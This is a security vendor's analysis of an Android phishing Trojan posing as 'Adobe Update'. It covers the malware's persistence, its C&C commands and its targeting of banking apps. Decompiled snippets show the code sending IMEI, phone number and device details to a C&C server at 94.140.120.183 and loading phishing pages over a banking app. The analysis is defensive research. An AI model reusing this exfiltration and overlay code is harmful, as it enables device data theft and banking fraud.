— Trustlook Research Team
Smartphones have been permeating into every corner of the world. After years of rapid growth, their popularity and usefulness reaches that of personal computers. Besides calling and texting, it is becoming more popular for people to do daily banking on their smartphone. With the computing capability, some traditional malware are shifting into the world of smartphones. They compromise the smartphone, change the phone behavior, and receive instructions from the remote attacker to steal user’s information.
One of these examples is a newly discovered malicious app named “Adobe Update”, which has the package name “droid.invisible”. It is a phishing Trojan that targets the android platform.
The sample’s MD5 is : D8616CDD54154B06A5E4D9D5B2A605E5
The package icon is::

In virustotal among 57 antivirus vendors, only 3 vendors detected them when initially submitted.

The malware conceals its own developer certificate information behind a reputable enterprise :

Yet the official com.adobe.reader app in Google Play is of this correct developer certificate:

Upon installation, this malware presents the user with a misleading setup dialog box while replacing the default SMS app:

The app displays messages to entice user to grant the device admin to maintain the persistence on the system:

The app cannot be uninstalled by the normal means:

The app communicates with a remote server and sends out critical personal information:
- Country
- Device model
- IMEI
- Network operator
- Cell phone number
- Malware bot ID
- OS version
- Device name
- OS API level

The following code snippets demonstrate the above behaviours:
class a implements Runnable
[…]
Thread.sleep(20000L);
Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] – SEND MOBILE DATA”);
a.a.a.a.a locala = new a.a.a.a.a();
x localx = new x();
TelephonyManager localTelephonyManager = (TelephonyManager)this.a.getSystemService(“phone”);
localx.a(“id”, localTelephonyManager.getDeviceId());
localx.a(“country”, localTelephonyManager.getNetworkCountryIso());
localx.a(“opname”, localTelephonyManager.getNetworkOperatorName());
localx.a(“osversion”, System.getProperty(“os.version”) + “(” + Build.VERSION.INCREMENTAL + “)”);
localx.a(“osapilevel”, Build.VERSION.RELEASE + “(” + Build.VERSION.SDK_INT + “)”);
localx.a(“device”, Build.DEVICE);
localx.a(“model”, Build.MODEL + ” (” + Build.PRODUCT + “)”);
localx.a(“pnumber”, localTelephonyManager.getLine1Number());
localx.a(“botid”, “777”);
locala.a(“http://94.140.120.183/gate/receive.php”, localx, new b(this));
[…]
Furthermore, the malware receives command instructions from the C&C server to perform various functions:
- loop // wait for next command
- sms // send sms message
- readsms // retrieve sms message and send to the C&C server
- ion // the function is not implemented, write to log file
- ioff // same as above
- recall // call received numbers.
- fish // show an attacker controlled web page when a specific foreground running app is found.
The following code snippets demonstrate the malware checks for the received parameters and shows a phishing web page:
if (paramArrayOfByte[0].equals(“fish”)) // compare command name
{
Log.d(“INVISIBLE-LOG”, “[GATE SERVICE] :: FISH”);
this.b.a.startService(new Intent(this.b.a, InjectionScanner.class).putExtra(“data”, paramArrayOfByte[1]));
}
[…]
public class InjectionScanner extends Service
{
int a = 0;
String b;
public String a()
{
return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName; // get foreground running process name
}
public void a(String paramString)
{
paramString = new Thread(new g(this, paramString));
paramString.setDaemon(true);
paramString.start();
}
[…]
public class InjectionScanner extends Service
{
int a = 0;
String b;
public String a()
{
return ((ActivityManager.RunningAppProcessInfo)((ActivityManager)getSystemService(“activity”)).getRunningAppProcesses().get(0)).processName;
}
[…]
public int onStartCommand(Intent paramIntent, int paramInt1, int paramInt2)
{
this.b = paramIntent.getStringExtra(“data”);
a();
a(this.b);
return paramInt1;
[…]
(this.b.a().equals(localJSONObject.getJSONObject(localJSONObject.names().getString(i)).getJSONArray(“apps”).getString(j))) // compare the foreground running app name with received string
{
Intent localIntent = new Intent(this.b, InjectionActivity.class);
localIntent.addFlags(268435456);
localIntent.putExtra(“injection”, localJSONObject.names().getString(i));
this.b.startActivity(localIntent);
this.b.a = 1;
[…]
@SuppressLint({“SetJavaScriptEnabled”})
protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
setContentView(2130968604);
paramBundle = (TelephonyManager)getSystemService(“phone”);
Intent localIntent = getIntent();
WebView localWebView = (WebView)findViewById(2131492971);
localWebView.getSettings().setJavaScriptEnabled(true);
localWebView.setWebViewClient(new f(this, null));
localWebView.setWebChromeClient(new e(this, null));
localWebView.loadUrl(“http://94.140.120.183/injections/?bank=” + localIntent.getStringExtra(“injection”) + “&imei=” + paramBundle.getDeviceId()); // show phishing web page
}
}
The malware displays phishing web page when a specific app is found, for example, the banking app. The fraudsters persuade gullible users to enter their financial details and harvest all the information.
The C&C server 94.140.120.183 is located in Latvia:
http://whois.domaintools.com/94.140.120.183
